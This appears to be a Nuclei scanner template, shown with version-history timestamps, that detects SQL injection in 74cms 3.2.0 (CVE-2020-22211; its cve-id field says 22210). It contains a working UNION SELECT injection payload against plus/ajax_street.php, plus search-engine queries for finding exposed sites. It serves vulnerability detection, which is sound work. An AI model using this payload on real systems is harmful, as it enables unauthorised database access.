2022-06-05 10:39:55 +00:00
|
|
|
id: CVE-2020-22211
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: 74cms Sql Injection
|
|
|
|
author: ritikchaddha
|
|
|
|
severity: critical
|
|
|
|
description: |
|
|
|
|
SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php.
|
|
|
|
reference:
|
|
|
|
- https://github.com/blindkey/cve_like/issues/13
|
2022-06-09 11:38:54 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-22211
|
2022-06-05 10:39:55 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
|
|
|
cve-id: CVE-2020-22210
|
|
|
|
cwe-id: CWE-89
|
|
|
|
metadata:
|
|
|
|
fofa-query: app="74cms"
|
|
|
|
shodan-query: http.html:"Powered by 74cms"
|
|
|
|
tags: cve,cve2020,74cms,sqli
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2022-06-10 13:34:19 +00:00
|
|
|
- "{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{randstr}}),9%23"
|
2022-06-05 10:39:55 +00:00
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2022-06-05 11:46:08 +00:00
|
|
|
- '{{md5("{{randstr}}")}}'
|